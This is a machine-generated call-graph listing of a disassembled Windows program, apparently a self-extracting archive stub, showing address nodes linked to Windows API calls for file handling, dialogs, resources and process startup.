24566 6babb 24567 6a64e __vsnwprintf_l 21 API calls 24566->24567 24571 6badc __vsnwprintf_l 24566->24571 24567->24571 24568->24558 24569 6bb51 24585 6bbd3 20 API calls _free 24569->24585 24571->24569 24572 6bf7c __vsnwprintf_l 11 API calls 24571->24572 24573 6bb30 24572->24573 24573->24569 24574 6bb3f WideCharToMultiByte 24573->24574 24574->24569 24575 6bb7f 24574->24575 24587 6bbd3 20 API calls _free 24575->24587 24578 6bca8 _abort 5 API calls 24577->24578 24579 6bfa3 24578->24579 24582 6bfac 24579->24582 24588 6c004 10 API calls 3 library calls 24579->24588 24581 6bfec LCMapStringW 24581->24582 24583 60bcc _ValidateLocalCookies 5 API calls 24582->24583 24584 6ba70 24583->24584 24584->24558 24584->24565 24584->24566 24585->24558 24586->24554 24587->24558 24588->24581 26047 6d040 GetProcessHeap 26117 60f40 LocalFree 26048 5d755 97 API calls 4 library calls 26101 5d755 102 API calls 4 library calls 26052 58850 132 API calls 26102 5c650 100 API calls 26053 60450 27 API calls 26118 72f50 CloseHandle 24599 60462 24600 6046e ___scrt_is_nonwritable_in_current_image 24599->24600 24631 5fffc 24600->24631 24602 60475 24603 605c8 24602->24603 24606 6049f 24602->24606 24708 6085a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24603->24708 24605 605cf 24701 6916a 24605->24701 24615 604de ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24606->24615 24642 69d0d 24606->24642 24613 604be 24622 6053f 24615->24622 24704 68c5c 38 API calls _abort 24615->24704 24617 60545 24651 69c5e 51 API calls 24617->24651 24620 6054d 24652 5eedc 24620->24652 24650 60975 GetStartupInfoW _abort 24622->24650 24625 60561 24625->24605 24626 60565 24625->24626 24627 6056e 24626->24627 24706 6910d 28 API calls _abort 24626->24706 24707 6016d 12 API calls ___scrt_uninitialize_crt 24627->24707 24630 60576 24630->24613 24632 60005 24631->24632 24710 60676 IsProcessorFeaturePresent 24632->24710 24634 60011 24711 63a3e 24634->24711 24636 60016 24637 6001a 24636->24637 24719 69b97 24636->24719 24637->24602 24640 60031 24640->24602 24643 69d24 24642->24643 24644 60bcc _ValidateLocalCookies 5 API calls 24643->24644 24645 604b8 24644->24645 24645->24613 24646 69cb1 24645->24646 24649 69ce0 24646->24649 24647 60bcc _ValidateLocalCookies 5 API calls 24648 69d09 24647->24648 24648->24615 24649->24647 24650->24617 24651->24620 24810 51b5c 24652->24810 24656 5eefc 24859 5bceb 24656->24859 24658 5ef05 _abort 24659 5ef18 GetCommandLineW 24658->24659 24660 5efbc GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24659->24660 24661 5ef2b 24659->24661 24663 44a00 _swprintf 51 API calls 24660->24663 24893 5d588 83 API calls 24661->24893 24665 5f023 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24663->24665 24664 5ef31 24666 5efb6 24664->24666 24667 5ef39 OpenFileMappingW 24664->24667 24863 5c76d LoadBitmapW 24665->24863 24897 5ebae SetEnvironmentVariableW SetEnvironmentVariableW 24666->24897 24670 5ef51 MapViewOfFile 24667->24670 24671 5efad CloseHandle 24667->24671 24674 5efa6 UnmapViewOfFile 24670->24674 24675 5ef62 __InternalCxxFrameHandler 24670->24675 24671->24660 24674->24671 24894 5ebae SetEnvironmentVariableW SetEnvironmentVariableW 24675->24894 24680 5ef7e 24895 50675 82 API calls 24680->24895 24681 5a0a7 27 API calls 24683 5f083 DialogBoxParamW 24681->24683 24685 5f0bd 24683->24685 24684 5ef92 24896 5072b 82 API calls _wcslen 24684->24896 24688 5f0d6 24685->24688 24689 5f0cf Sleep 24685->24689 24687 5ef9d 24687->24674 24691 5f0e4 24688->24691 24898 5becf CompareStringW SetCurrentDirectoryW _abort _wcslen 24688->24898 24689->24688 24692 5f103 DeleteObject 24691->24692 24693 5f11f 24692->24693 24694 5f118 DeleteObject 24692->24694 24695 5f150 24693->24695 24696 5f162 24693->24696 24694->24693 24899 5ec0b 6 API calls 24695->24899 24890 5bd51 24696->24890 24699 5f156 CloseHandle 24699->24696 24700 5f19c 24705 609ab GetModuleHandleW 24700->24705 25062 68ee7 24701->25062 24704->24622 24705->24625 24706->24627 24707->24630 24708->24605 24710->24634 24723 64ae7 24711->24723 24715 63a4f 24716 63a5a 24715->24716 24737 64b23 DeleteCriticalSection 24715->24737 24716->24636 24718 63a47 24718->24636 24764 6d06a 24719->24764 24722 63a5d 7 API calls 2 library calls 24722->24637 24724 64af0 24723->24724 24726 64b19 24724->24726 24727 63a43 24724->24727 24738 64d2c 24724->24738 24743 64b23 DeleteCriticalSection 24726->24743 24727->24718 24729 63b6c 24727->24729 24757 64c3d 24729->24757 24732 63b81 24732->24715 24734 63b8f 24735 63b9c 24734->24735 24763 63b9f 6 API calls ___vcrt_FlsFree 24734->24763 24735->24715 24737->24718 24744 64b52 24738->24744 24741 64d64 InitializeCriticalSectionAndSpinCount 24742 64d4f 24741->24742 24742->24724 24743->24727 24745 64b73 24744->24745 24746 64b6f 24744->24746 24745->24746 24747 64bdb GetProcAddress 24745->24747 24750 64bcc 24745->24750 24752 64bf2 LoadLibraryExW 24745->24752 24746->24741 24746->24742 24747->24746 24749 64be9 24747->24749 24749->24746 24750->24747 24751 64bd4 FreeLibrary 24750->24751 24751->24747 24753 64c39 24752->24753 24754 64c09 GetLastError 24752->24754 24753->24745 24754->24753 24755 64c14 ___vcrt_FlsSetValue 24754->24755 24755->24753 24756 64c2a LoadLibraryExW 24755->24756 24756->24745 24758 64b52 ___vcrt_FlsSetValue 5 API calls 24757->24758 24759 64c57 24758->24759 24760 64c70 TlsAlloc 24759->24760 24761 63b76 24759->24761 24761->24732 24762 64cee 6 API calls ___vcrt_FlsSetValue 24761->24762 24762->24734 24763->24732 24767 6d087 24764->24767 24768 6d083 24764->24768 24765 60bcc _ValidateLocalCookies 5 API calls 24766 60023 24765->24766 24766->24640 24766->24722 24767->24768 24770 6b6b0 24767->24770 24768->24765 24771 6b6bc ___scrt_is_nonwritable_in_current_image 24770->24771 24782 6bc41 EnterCriticalSection 24771->24782 24773 6b6c3 24783 6d538 24773->24783 24775 6b6d2 24781 6b6e1 24775->24781 24796 6b539 29 API calls 24775->24796 24778 6b6dc 24797 6b5ef GetStdHandle GetFileType 24778->24797 24780 6b6f2 _abort 24780->24767 24798 6b6fd LeaveCriticalSection _abort 24781->24798 24782->24773 24784 6d544 ___scrt_is_nonwritable_in_current_image 24783->24784 24785 6d551 24784->24785 24786 6d568 24784->24786 24807 6a63b 20 API calls _abort 24785->24807 24799 6bc41 EnterCriticalSection 24786->24799 24789 6d556 24808 65009 26 API calls _abort 24789->24808 24791 6d560 _abort 24791->24775 24792 6d5a0 24809 6d5c7 LeaveCriticalSection _abort 24792->24809 24793 6d574 24793->24792 24800 6d489 24793->24800 24796->24778 24797->24781 24798->24780 24799->24793 24801 6c146 _abort 20 API calls 24800->24801 24802 6d49b 24801->24802 24804 6bf1a 11 API calls 24802->24804 24806 6d4a8 24802->24806 24803 6a4ba _free 20 API calls 24805 6d4fa 24803->24805 24804->24802 24805->24793 24806->24803 24807->24789 24808->24791 24809->24791 24811 5fe20 24810->24811 24812 51b66 GetModuleHandleW 24811->24812 24813 51b81 GetProcAddress 24812->24813 24814 51be0 24812->24814 24816 51bb2 GetProcAddress 24813->24816 24817 51b9a 24813->24817 24815 51f0d GetModuleFileNameW 24814->24815 24909 6883e 42 API calls __vsnwprintf_l 24814->24909 24826 51f2b 24815->24826 24819 51bc4 24816->24819 24817->24816 24819->24814 24820 51e4d 24820->24815 24821 51e58 GetModuleFileNameW CreateFileW 24820->24821 24822 51f01 CloseHandle 24821->24822 24823 51e88 SetFilePointer 24821->24823 24822->24815 24823->24822 24824 51e96 ReadFile 24823->24824 24824->24822 24827 51eb4 24824->24827 24829 51f8d GetFileAttributesW 24826->24829 24830 51fa5 24826->24830 24832 51f56 CompareStringW 24826->24832 24900 4c5f9 24826->24900 24903 51b14 24826->24903 24827->24822 24831 51b14 2 API calls 24827->24831 24829->24826 24829->24830 24833 51fb0 24830->24833 24836 51fe5 24830->24836 24831->24827 24832->24826 24835 51fc9 GetFileAttributesW 24833->24835 24838 51fe1 24833->24838 24834 520f4 24858 5b62d GetCurrentDirectoryW 24834->24858 24835->24833 24835->24838 24836->24834 24837 4c5f9 GetVersionExW 24836->24837 24839 51fff 24837->24839 24838->24836 24840 52006 24839->24840 24841 5206c 24839->24841 24843 51b14 2 API calls 24840->24843 24842 44a00 _swprintf 51 API calls 24841->24842 24844 52094 AllocConsole 24842->24844 24845 52010 24843->24845 24846 520a1 GetCurrentProcessId AttachConsole 24844->24846 24847 520ec ExitProcess 24844->24847 24848 51b14 2 API calls 24845->24848 24910 64df3 24846->24910 24850 5201a 24848->24850 24852 4f917 53 API calls 24850->24852 24851 520c2 GetStdHandle WriteConsoleW Sleep FreeConsole 24851->24847 24853 52035 24852->24853 24854 44a00 _swprintf 51 API calls 24853->24854 24855 52048 24854->24855 24856 4f917 53 API calls 24855->24856 24857 52057 24856->24857 24857->24847 24858->24656 24860 51b14 2 API calls 24859->24860 24861 5bcff OleInitialize 24860->24861 24862 5bd22 GdiplusStartup SHGetMalloc 24861->24862 24862->24658 24864 5c78e 24863->24864 24865 5c79b GetObjectW 24863->24865 24917 5b6a2 FindResourceW 24864->24917 24869 5c7aa 24865->24869 24912 5b5a6 24869->24912 24871 5c800 24882 4ed42 24871->24882 24872 5c7dc 24931 5b5e5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24872->24931 24873 5b6a2 12 API calls 24875 5c7cd 24873->24875 24875->24872 24877 5c7d3 DeleteObject 24875->24877 24876 5c7e4 24932 5b5c4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24876->24932 24877->24872 24879 5c7ed 24933 5b7ec 8 API calls 24879->24933 24881 5c7f4 DeleteObject 24881->24871 24944 4ed67 24882->24944 24887 5a0a7 24888 5fd0e 27 API calls 24887->24888 24889 5a0c6 24888->24889 24889->24681 24891 5bd80 GdiplusShutdown OleUninitialize 24890->24891 24891->24700 24893->24664 24894->24680 24895->24684 24896->24687 24897->24660 24898->24691 24899->24699 24901 4c60d GetVersionExW 24900->24901 24902 4c649 24900->24902 24901->24902 24902->24826 24904 5fe20 24903->24904 24905 51b21 GetSystemDirectoryW 24904->24905 24906 51b57 24905->24906 24907 51b39 24905->24907 24906->24826 24908 51b4a LoadLibraryW 24907->24908 24908->24906 24909->24820 24911 64dfb 24910->24911 24911->24851 24911->24911 24934 5b5c4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24912->24934 24914 5b5ad 24915 5b5b9 24914->24915 24935 5b5e5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24914->24935 24915->24871 24915->24872 24915->24873 24918 5b6c5 SizeofResource 24917->24918 24919 5b7b3 24917->24919 24918->24919 24920 5b6dc LoadResource 24918->24920 24919->24865 24919->24869 24920->24919 24921 5b6f1 LockResource 24920->24921 24921->24919 24922 5b702 GlobalAlloc 24921->24922 24922->24919 24923 5b71d GlobalLock 24922->24923 24924 5b7ac GlobalFree 24923->24924 24925 5b72c __InternalCxxFrameHandler 24923->24925 24924->24919 24926 5b7a5 GlobalUnlock 24925->24926 24936 5b606 GdipAlloc 24925->24936 24926->24924 24929 5b790 24929->24926 24930 5b77a GdipCreateHBITMAPFromBitmap 24930->24929 24931->24876 24932->24879 24933->24881 24934->24914 24935->24915 24937 5b625 24936->24937 24938 5b618 24936->24938 24937->24926 24937->24929 24937->24930 24940 5b398 24938->24940 24941 5b3c0 GdipCreateBitmapFromStream 24940->24941 24942 5b3b9 GdipCreateBitmapFromStreamICM 24940->24942 24943 5b3c5 24941->24943 24942->24943 24943->24937 24945 4ed75 __EH_prolog 24944->24945 24946 4eda4 GetModuleFileNameW 24945->24946 24947 4edd5 24945->24947 24948 4edbe 24946->24948 24990 4ab20 24947->24990 24948->24947 24950 4ee31 25001 67580 24950->25001 24952 4f561 78 API calls 24955 4ee05 24952->24955 24955->24950 24955->24952 24968 4f04a 24955->24968 24956 4ee44 24957 67580 26 API calls 24956->24957 24965 4ee56 ___vcrt_FlsSetValue 24957->24965 24958 4ef85 24958->24968 25028 4afe0 81 API calls 24958->25028 24960 4b0f0 79 API calls 24960->24965 24962 4ef9f ___std_exception_copy 24963 4ae40 82 API calls 24962->24963 24962->24968 24966 4efc8 ___std_exception_copy 24963->24966 24965->24958 24965->24960 24965->24968 25022 4ae40 24965->25022 25027 4afe0 81 API calls 24965->25027 24966->24968 24985 4efd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 24966->24985 25029 52ea2 MultiByteToWideChar 24966->25029 25015 4a7df 24968->25015 24969 4f459 24975 4f4de 24969->24975 25035 69eee 26 API calls 2 library calls 24969->25035 24972 4f46e 25036 68868 26 API calls 2 library calls 24972->25036 24973 4f4c6 25037 4f57c 78 API calls 24973->25037 24974 4f514 24977 67580 26 API calls 24974->24977 24975->24974 24981 4f561 78 API calls 24975->24981 24979 4f52d 24977->24979 24980 67580 26 API calls 24979->24980 24980->24968 24981->24975 24984 530c5 WideCharToMultiByte 24984->24985 24985->24968 24985->24969 24985->24984 25030 4f8b1 50 API calls __vsnprintf 24985->25030 25031 673c1 26 API calls 3 library calls 24985->25031 25032 69eee 26 API calls 2 library calls 24985->25032 25033 68868 26 API calls 2 library calls 24985->25033 25034 4f57c 78 API calls 24985->25034 24988 4f59e GetModuleHandleW FindResourceW 24989 4ed55 24988->24989 24989->24887 24991 4ab2a 24990->24991 24992 4ab8b CreateFileW 24991->24992 24993 4abac GetLastError 24992->24993 24997 4abfb 24992->24997 24994 4cf12 GetCurrentDirectoryW 24993->24994 24995 4abcc 24994->24995 24996 4abd0 CreateFileW GetLastError 24995->24996 24995->24997 24996->24997 24999 4abf5 24996->24999 24998 4ac3f 24997->24998 25000 4ac25 SetFileTime 24997->25000 24998->24955 24999->24997 25000->24998 25002 675b9 25001->25002 25003 675bd 25002->25003 25014 675e5 25002->25014 25038 6a63b 20 API calls _abort 25003->25038 25005 675c2 25039 65009 26 API calls _abort 25005->25039 25006 67909 25008 60bcc _ValidateLocalCookies 5 API calls 25006->25008 25010 67916 25008->25010 25009 675cd 25011 60bcc _ValidateLocalCookies 5 API calls 25009->25011 25010->24956 25013 675d9 25011->25013 25013->24956 25014->25006 25040 674a0 5 API calls _ValidateLocalCookies 25014->25040 25016 4a803 25015->25016 25017 4a814 25015->25017 25016->25017 25018 4a816 25016->25018 25019 4a80f 25016->25019 25017->24988 25046 4a860 25018->25046 25041 4a98e 25019->25041 25023 4ae4c 25022->25023 25025 4ae53 25022->25025 25023->24965 25025->25023 25026 4a9c5 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25025->25026 25061 4779d 77 API calls 25025->25061 25026->25025 25027->24965 25028->24962 25029->24985 25030->24985 25031->24985 25032->24985 25033->24985 25034->24985 25035->24972 25036->24973 25037->24975 25038->25005 25039->25009 25040->25014 25042 4a997 25041->25042 25043 4a9c1 25041->25043 25042->25043 25052 4b450 25042->25052 25043->25017 25047 4a86c 25046->25047 25048 4a88a 25046->25048 25047->25048 25050 4a878 FindCloseChangeNotification 25047->25050 25049 4a8a9 25048->25049 25060 47665 76 API calls 25048->25060 25049->25017 25050->25048 25053 5fe20 25052->25053 25054 4b45d DeleteFileW 25053->25054 25055 4b470 25054->25055 25056 4a9bf 25054->25056 25057 4cf12 GetCurrentDirectoryW 25055->25057 25056->25017 25058 4b484 25057->25058 25058->25056 25059 4b488 DeleteFileW 25058->25059 25059->25056 25060->25049 25061->25025 25063 68ef3 _abort 25062->25063 25064 68f0c 25063->25064 25065 68efa 25063->25065 25086 6bc41 EnterCriticalSection 25064->25086 25098 69041 GetModuleHandleW 25065->25098 25068 68eff 25068->25064 25099 69085 GetModuleHandleExW 25068->25099 25072 68f13 25074 68f88 25072->25074 25084 68fb1 25072->25084 25107 69a00 20 API calls _abort 25072->25107 25075 68fa0 25074->25075 25080 69cb1 _abort 5 API calls 25074->25080 25081 69cb1 _abort 5 API calls 25075->25081 25076 68fce 25090 69000 25076->25090 25077 68ffa 25108 733a0 5 API calls _ValidateLocalCookies 25077->25108 25080->25075 25081->25084 25087 68ff1 25084->25087 25086->25072 25109 6bc91 LeaveCriticalSection 25087->25109 25089 68fca 25089->25076 25089->25077 25110 6c086 25090->25110 25093 6902e 25096 69085 _abort 8 API calls 25093->25096 25094 6900e GetPEB 25094->25093 25095 6901e GetCurrentProcess TerminateProcess 25094->25095 25095->25093 25097 69036 ExitProcess 25096->25097 25098->25068 25100 690d2 25099->25100 25101 690af GetProcAddress 25099->25101 25103 690e1 25100->25103 25104 690d8 FreeLibrary 25100->25104 25102 690c4 25101->25102 25102->25100 25105 60bcc _ValidateLocalCookies 5 API calls 25103->25105 25104->25103 25106 68f0b 25105->25106 25106->25064 25107->25074 25109->25089 25111 6c0a1 25110->25111 25112 6c0ab 25110->25112 25114 60bcc _ValidateLocalCookies 5 API calls 25111->25114 25113 6bca8 _abort 5 API calls 25112->25113 25113->25111 25115 6900a 25114->25115 25115->25093 25115->25094 26055 5b060 28 API calls 25116 6d061 31 API calls _ValidateLocalCookies 25135 41075 25136 504c5 41 API calls 25135->25136 25137 4107a 25136->25137 25140 601c2 29 API calls 25137->25140 25139 41084 25140->25139 26056 5ec71 DialogBoxParamW 26080 42570 96 API calls 25141 5c870 25142 5c87a __EH_prolog 25141->25142 25309 412f6 25142->25309 25145 5c8d1 25146 5cf91 25374 5e66e 25146->25374 25147 5c8ba 25147->25145 25149 5c8c8 25147->25149 25150 5c92b 25147->25150 25153 5c8cc 25149->25153 25154 5c908 25149->25154 25152 5c9be GetDlgItemTextW 25150->25152 25157 5c941 25150->25157 25152->25154 25160 5c9fb 25152->25160 25153->25145 25164 4f917 53 API calls 25153->25164 25154->25145 25161 5c9ef EndDialog 25154->25161 25155 5cfac SendMessageW 25156 5cfba 25155->25156 25158 5cfd4 GetDlgItem SendMessageW 25156->25158 25159 5cfc3 SendDlgItemMessageW 25156->25159 25163 4f917 53 API calls 25157->25163 25392 5b62d GetCurrentDirectoryW 25158->25392 25159->25158 25162 5ca10 GetDlgItem 25160->25162 25307 5ca04 25160->25307 25161->25145 25166 5ca24 SendMessageW SendMessageW 25162->25166 25167 5ca47 SetFocus 25162->25167 25168 5c95e SetDlgItemTextW 25163->25168 25169 5c8eb 25164->25169 25166->25167 25173 5ca57 25167->25173 25184 5ca70 25167->25184 25174 5c969 25168->25174 25412 4122f SHGetMalloc 25169->25412 25170 5d004 GetDlgItem 25171 5d027 SetWindowTextW 25170->25171 25172 5d021 25170->25172 25393 5bb90 GetClassNameW 25171->25393 25172->25171 25178 4f917 53 API calls 25173->25178 25174->25145 25182 5c976 GetMessageW 25174->25182 25176 5ced7 25180 4f917 53 API calls 25176->25180 25183 5ca61 25178->25183 25179 5c8f2 25179->25145 25185 5d27e SetDlgItemTextW 25179->25185 25186 5cee7 SetDlgItemTextW 25180->25186 25182->25145 25188 5c98d IsDialogMessageW 25182->25188 25413 5e496 25183->25413 25191 4f917 53 API calls 25184->25191 25185->25145 25192 5cefb 25186->25192 25188->25174 25190 5c99c TranslateMessage DispatchMessageW 25188->25190 25190->25174 25194 5caa7 25191->25194 25195 4f917 53 API calls 25192->25195 25197 44a00 _swprintf 51 API calls 25194->25197 25231 5cf1e _wcslen 25195->25231 25196 5d072 25200 5d0a2 25196->25200 25203 4f917 53 API calls 25196->25203 25202 5cab9 25197->25202 25198 5d701 97 API calls 25198->25196 25199 5ca69 25319 4b321 25199->25319 25205 5d701 97 API calls 25200->25205 25262 5d15a 25200->25262 25207 5e496 16 API calls 25202->25207 25208 5d085 SetDlgItemTextW 25203->25208 25212 5d0bd 25205->25212 25206 5d20d 25213 5d216 EnableWindow 25206->25213 25214 5d21f 25206->25214 25207->25199 25216 4f917 53 API calls 25208->25216 25209 5caf8 GetLastError 25210 5cb03 25209->25210 25325 5bbe9 SetCurrentDirectoryW 25210->25325 25224 5d0cf 25212->25224 25253 5d0f4 25212->25253 25213->25214 25219 5d23c 25214->25219 25431 412b3 GetDlgItem EnableWindow 25214->25431 25215 5cf6f 25218 4f917 53 API calls 25215->25218 25220 5d099 SetDlgItemTextW 25216->25220 25217 5cb17 25222 5cb2e 25217->25222 25223 5cb20 GetLastError 25217->25223 25218->25145 25221 5d263 25219->25221 25232 5d25b SendMessageW 25219->25232 25220->25200 25221->25145 25233 4f917 53 API calls 25221->25233 25228 5cba1 25222->25228 25234 5cb3e GetTickCount 25222->25234 25235 5cbb0 25222->25235 25223->25222 25429 5aec5 32 API calls 25224->25429 25225 5d14d 25227 5d701 97 API calls 25225->25227 25227->25262 25228->25235 25237 5cdd8 25228->25237 25230 5d232 25432 412b3 GetDlgItem EnableWindow 25230->25432 25231->25215 25236 4f917 53 API calls 25231->25236 25232->25221 25233->25179 25241 44a00 _swprintf 51 API calls 25234->25241 25244 5cd7d 25235->25244 25245 5cd73 25235->25245 25246 5cbc9 GetModuleFileNameW 25235->25246 25242 5cf52 25236->25242 25334 412d1 GetDlgItem ShowWindow 25237->25334 25238 5d0e8 25238->25253 25248 5cb57 25241->25248 25249 44a00 _swprintf 51 API calls 25242->25249 25243 5d1eb 25430 5aec5 32 API calls 25243->25430 25252 4f917 53 API calls 25244->25252 25245->25154 25245->25244 25423 505c6 82 API calls 25246->25423 25247 5cde8 25335 412d1 GetDlgItem ShowWindow 25247->25335 25326 4a8ae 25248->25326 25249->25215 25259 5cd87 25252->25259 25253->25225 25254 5d701 97 API calls 25253->25254 25260 5d122 25254->25260 25256 4f917 53 API calls 25256->25262 25257 5d20a 25257->25206 25258 5cbed 25263 44a00 _swprintf 51 API calls 25258->25263 25264 44a00 _swprintf 51 API calls 25259->25264 25260->25225 25265 5d12b DialogBoxParamW 25260->25265 25261 5cdf2 25266 4f917 53 API calls 25261->25266 25262->25206 25262->25243 25262->25256 25268 5cc0f CreateFileMappingW 25263->25268 25269 5cda5 25264->25269 25265->25154 25265->25225 25270 5cdfc SetDlgItemTextW 25266->25270 25272 5cc6d GetCommandLineW 25268->25272 25301 5cce4 __InternalCxxFrameHandler 25268->25301 25278 4f917 53 API calls 25269->25278 25336 412d1 GetDlgItem ShowWindow 25270->25336 25271 5cb7d 25275 5cb84 GetLastError 25271->25275 25276 5cb8f 25271->25276 25277 5cc7e 25272->25277 25273 5ccef ShellExecuteExW 25299 5cd0a 25273->25299 25275->25276 25280 4a7df 80 API calls 25276->25280 25424 5c4b5 SHGetMalloc 25277->25424 25283 5cdbf 25278->25283 25279 5ce0e SetDlgItemTextW GetDlgItem 25284 5ce43 25279->25284 25285 5ce2b GetWindowLongW SetWindowLongW 25279->25285 25280->25228 25282 5cc9a 25425 5c4b5 SHGetMalloc 25282->25425 25337 5d701 25284->25337 25285->25284 25288 5cca6 25426 5c4b5 SHGetMalloc 25288->25426 25291 5cd4d 25291->25245 25297 5cd63 UnmapViewOfFile CloseHandle 25291->25297 25292 5d701 97 API calls 25294 5ce5f 25292->25294 25293 5ccb2 25427 50675 82 API calls 25293->25427 25362 5ea22 25294->25362 25297->25245 25298 5ccc3 MapViewOfFile 25298->25301 25299->25291 25302 5cd39 Sleep 25299->25302 25301->25273 25302->25291 25302->25299 25303 5d701 97 API calls 25306 5ce85 25303->25306 25304 5ceae 25428 412b3 GetDlgItem EnableWindow 25304->25428 25306->25304 25308 5d701 97 API calls 25306->25308 25307->25154 25307->25176 25308->25304 25310 412ff 25309->25310 25311 41358 25309->25311 25313 41365 25310->25313 25433 4f5e8 62 API calls 2 library calls 25310->25433 25434 4f5c1 GetWindowLongW SetWindowLongW 25311->25434 25313->25145 25313->25146 25313->25147 25315 41321 25315->25313 25316 41334 GetDlgItem 25315->25316 25316->25313 25317 41344 25316->25317 25317->25313 25318 4134a SetWindowTextW 25317->25318 25318->25313 25322 4b32b 25319->25322 25320 4b3e5 25320->25209 25320->25210 25321 4b3bc 25321->25320 25323 4b522 8 API calls 25321->25323 25322->25320 25322->25321 25435 4b522 25322->25435 25323->25320 25325->25217 25327 4a8b8 25326->25327 25328 4a915 CreateFileW 25327->25328 25329 4a909 25327->25329 25328->25329 25330 4a95f 25329->25330 25331 4cf12 GetCurrentDirectoryW 25329->25331 25330->25271 25332 4a944 25331->25332 25332->25330 25333 4a948 CreateFileW 25332->25333 25333->25330 25334->25247 25335->25261 25336->25279 25338 5d70b __EH_prolog 25337->25338 25344 5ce51 25338->25344 25456 5c3a4 ExpandEnvironmentStringsW 25338->25456 25342 5da29 SetWindowTextW 25351 5d742 _wcslen _wcsrchr 25342->25351 25344->25292 25346 6506e 22 API calls 25346->25351 25348 5d817 SetFileAttributesW 25349 5d8d1 GetFileAttributesW 25348->25349 25361 5d831 _abort _wcslen 25348->25361 25349->25351 25353 5d8e3 DeleteFileW 25349->25353 25351->25342 25351->25344 25351->25346 25351->25348 25351->25361 25457 532e6 CompareStringW 25351->25457 25458 5b62d GetCurrentDirectoryW 25351->25458 25460 4b9aa 6 API calls 25351->25460 25461 4b933 FindClose 25351->25461 25462 5c51e 76 API calls 2 library calls 25351->25462 25463 5c3a4 ExpandEnvironmentStringsW 25351->25463 25353->25351 25355 5d8f4 25353->25355 25354 5dbf3 GetDlgItem SetWindowTextW SendMessageW 25354->25361 25356 44a00 _swprintf 51 API calls 25355->25356 25358 5d914 GetFileAttributesW 25356->25358 25357 5dc33 SendMessageW 25357->25351 25358->25355 25359 5d929 MoveFileW 25358->25359 25359->25351 25360 5d941 MoveFileExW 25359->25360 25360->25351 25361->25349 25361->25351 25361->25354 25361->25357 25459 4cda0 51 API calls 2 library calls 25361->25459 25363 5ea2c __EH_prolog 25362->25363 25464 5195c 25363->25464 25365 5ea5d 25468 464cd 25365->25468 25367 5ea7b 25472 48803 25367->25472 25371 5eace 25490 488ea 25371->25490 25373 5ce70 25373->25303 25375 5e678 25374->25375 25376 5b5a6 4 API calls 25375->25376 25377 5e67d 25376->25377 25378 5e685 GetWindow 25377->25378 25379 5cf97 25377->25379 25378->25379 25382 5e6a5 25378->25382 25379->25155 25379->25156 25380 5e6b2 GetClassNameW 25999 532e6 CompareStringW 25380->25999 25382->25379 25382->25380 25383 5e6d6 GetWindowLongW 25382->25383 25384 5e73a GetWindow 25382->25384 25383->25384 25385 5e6e6 SendMessageW 25383->25385 25384->25379 25384->25382 25385->25384 25386 5e6fc GetObjectW 25385->25386 26000 5b5e5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25386->26000 25388 5e713 26001 5b5c4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25388->26001 26002 5b7ec 8 API calls 25388->26002 25391 5e724 SendMessageW DeleteObject 25391->25384 25392->25170 25394 5bbb1 25393->25394 25397 5bbd6 25393->25397 26003 532e6 CompareStringW 25394->26003 25396 5bbc4 25396->25397 25398 5bbc8 FindWindowExW 25396->25398 25399 5c133 25397->25399 25398->25397 25400 5c13d __EH_prolog 25399->25400 25401 413f8 43 API calls 25400->25401 25402 5c15f 25401->25402 26004 42083 25402->26004 25405 5c179 25407 41641 86 API calls 25405->25407 25406 5c188 25408 41a7e 142 API calls 25406->25408 25409 5c184 25407->25409 25410 5c1a7 __InternalCxxFrameHandler ___std_exception_copy 25408->25410 25409->25196 25409->25198 25411 41641 86 API calls 25410->25411 25411->25409 25412->25179 25414 5c5f8 5 API calls 25413->25414 25415 5e4a2 GetDlgItem 25414->25415 25416 5e4c4 25415->25416 25417 5e4f8 SendMessageW SendMessageW 25415->25417 25420 5e4cf ShowWindow SendMessageW SendMessageW 25416->25420 25418 5e534 25417->25418 25419 5e553 SendMessageW SendMessageW SendMessageW 25417->25419 25418->25419 25421 5e586 SendMessageW 25419->25421 25422 5e5a9 SendMessageW 25419->25422 25420->25417 25421->25422 25422->25199 25423->25258 25424->25282 25425->25288 25426->25293 25427->25298 25428->25307 25429->25238 25430->25257 25431->25230 25432->25219 25433->25315 25434->25313 25436 4b52f 25435->25436 25437 4b553 25436->25437 25438 4b546 CreateDirectoryW 25436->25438 25439 4b4a1 3 API calls 25437->25439 25438->25437 25440 4b586 25438->25440 25441 4b559 25439->25441 25443 4b595 25440->25443 25448 4b8c6 25440->25448 25442 4b599 GetLastError 25441->25442 25444 4cf12 GetCurrentDirectoryW 25441->25444 25442->25443 25443->25322 25446 4b56f 25444->25446 25446->25442 25447 4b573 CreateDirectoryW 25446->25447 25447->25440 25447->25442 25449 5fe20 25448->25449 25450 4b8d3 SetFileAttributesW 25449->25450 25451 4b916 25450->25451 25452 4b8e9 25450->25452 25451->25443 25453 4cf12 GetCurrentDirectoryW 25452->25453 25454 4b8fd 25453->25454 25454->25451 25455 4b901 SetFileAttributesW 25454->25455 25455->25451 25456->25351 25457->25351 25458->25351 25459->25361 25460->25351 25461->25351 25462->25351 25463->25351 25465 51969 _wcslen 25464->25465 25499 41895 25465->25499 25467 51981 25467->25365 25469 5195c _wcslen 25468->25469 25470 41895 78 API calls 25469->25470 25471 51981 25470->25471 25471->25367 25473 4880d __EH_prolog 25472->25473 25512 4e278 25473->25512 25475 48835 25476 5fd0e 27 API calls 25475->25476 25477 48879 _abort 25476->25477 25478 5fd0e 27 API calls 25477->25478 25479 488a0 25478->25479 25518 55c34 25479->25518 25482 48a18 25483 48a22 25482->25483 25484 48a95 25483->25484 25547 4b946 25483->25547 25487 48afa 25484->25487 25525 49082 25484->25525 25486 48b3c 25486->25371 25487->25486 25553 41397 74 API calls 25487->25553 25995 4a3f8 25490->25995 25492 4890b 25493 4891c Concurrency::cancel_current_task 25492->25493 25494 53516 86 API calls 25492->25494 25495 42111 26 API calls 25493->25495 25494->25493 25496 48943 25495->25496 25497 4e319 86 API calls 25496->25497 